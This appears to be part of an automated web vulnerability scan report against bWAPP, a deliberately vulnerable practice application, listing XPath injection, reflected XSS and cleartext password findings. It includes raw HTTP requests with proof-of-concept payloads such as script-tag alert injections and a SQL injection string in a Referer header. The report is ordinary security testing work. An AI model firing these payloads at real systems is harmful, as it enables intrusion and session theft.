Path:   /bWAPP/xss_eval.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xss_eval.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xss_eval.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security=maybe

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 04:05:29 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
3. Cross-site scripting (reflected)

There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Vulnerability classifications



3.1. http://192.168.52.147/bWAPP/ws_soap.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ws_soap.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload thduj"><script>alert(1)</script>i865v was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bWAPP/ws_soap.php/thduj"><script>alert(1)</script>i865v HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 06:10:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Length: 5030
Connection: close
Content-Type: text/html


       <html><head><title>NuSOAP: *** bWAPP Movie Service ***</title>
       <style type="text/css">
        body { font-family: arial; color: #000000; background-color: #ffffff; margin: 0px 0px 0px 0px; }
...[SNIP]...
<a href="/bWAPP/ws_soap.php/thduj"><script>alert(1)</script>i865v?wsdl">
...[SNIP]...
3.2. http://192.168.52.147/bWAPP/ws_soap.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ws_soap.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the HTML document as plain text between tags. The payload n8rx2<script>alert(1)</script>l0226 was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bWAPP/ws_soap.php/n8rx2<script>alert(1)</script>l0226 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 06:10:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Length: 5026
Connection: close
Content-Type: text/html


       <html><head><title>NuSOAP: *** bWAPP Movie Service ***</title>
       <style type="text/css">
        body { font-family: arial; color: #000000; background-color: #ffffff; margin: 0px 0px 0px 0px; }
...[SNIP]...
</font> http://192.168.52.147/bWAPP/ws_soap.php/n8rx2<script>alert(1)</script>l0226<br>
...[SNIP]...
4. Cleartext submission of password

There are 15 instances of this issue:

Issue background

Some applications transmit passwords over unencrypted connections, making them vulnerable to interception. To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

Vulnerability classifications



4.1. http://192.168.52.147/bWAPP/ba_captcha_bypass.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:14 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/ba_captcha_bypass.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.2. http://192.168.52.147/bWAPP/ba_insecure_login_2.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:25 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form>

<p>
...[SNIP]...
<br />
<input type="password" id="passphrase" name="passphrase" size="20" /></p>
...[SNIP]...
4.3. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:25 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form action="/bWAPP/ba_pwd_attacks_2.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.4. http://192.168.52.147/bWAPP/ba_weak_pwd.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bWAPP/ba_weak_pwd.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/sqli_11.php?title=ben%27+OR+%271%27+%3D+%271--&action=search
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:58:20 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13329

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form action="/bWAPP/ba_weak_pwd.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.5. http://192.168.52.147/bWAPP/http_verb_tampering.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/http_verb_tampering.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /bWAPP/http_verb_tampering.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/unrestricted_file_upload.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:55:31 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13382

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form action="/bWAPP/http_verb_tampering.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password_new" name="password_new"></p>
...[SNIP]...
<br />
<input type="password" id="password_conf" name="password_conf"></p>
...[SNIP]...
4.6. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/insecure_crypt_storage_2.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bWAPP/insecure_crypt_storage_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:25 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13259

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Arc
...[SNIP]...
</p>

<form action="/bWAPP/insecure_crypt_storage_2.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password"></p>
...[SNIP]...
4.7. http://192.168.52.147/bWAPP/ldap_connect.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ldap_connect.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bWAPP/ldap_connect.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/htmli_get.php?firstname=mike&lastname=smith&form=submit
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:53:01 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 14095

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form action="/bWAPP/ldap_connect.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" value="" size="20" autocomplete="off"></p>
...[SNIP]...
4.8. http://192.168.52.147/bWAPP/login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:52:17 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4019
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/login.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off"></p>
...[SNIP]...
4.9. http://192.168.52.147/bWAPP/password_change.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/password_change.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /bWAPP/password_change.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/portal.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:21:08 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13561

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form action="/bWAPP/password_change.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password_curr" name="password_curr"></p>
...[SNIP]...
<br />
<input type="password" id="password_new" name="password_new"></p>
...[SNIP]...
<br />
<input type="password" id="password_conf" name="password_conf"></p>
...[SNIP]...
4.10. http://192.168.52.147/bWAPP/sqli_16.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_16.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bWAPP/sqli_16.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:14 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13117

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/sqli_16.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.11. http://192.168.52.147/bWAPP/sqli_3.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_3.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bWAPP/sqli_3.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:13 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13126

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/sqli_3.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.12. http://192.168.52.147/bWAPP/user_extra.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/user_extra.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /bWAPP/user_extra.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/portal.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:21:21 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13910

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/user_extra.php" method="POST">

<table>
...[SNIP]...
<br />
<input type="password" id="password" name="password"></p>
...[SNIP]...
<br />
<input type="password" id="password_conf" name="password_conf"></p>
...[SNIP]...
4.13. http://192.168.52.147/bWAPP/user_new.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/user_new.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /bWAPP/user_new.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/login.php
Cookie: security_level=1; PHPSESSID=b2652a9585941cebb6cfa2a30b13c119

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:52:17 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Length: 3417
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/user_new.php" method="POST">

<table>
...[SNIP]...
<br />
<input type="password" id="password" name="password"></p>
...[SNIP]...
<br />
<input type="password" id="password_conf" name="password_conf"></p>
...[SNIP]...
4.14. http://192.168.52.147/bWAPP/xmli_1.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/xmli_1.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bWAPP/xmli_1.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:14 GMT
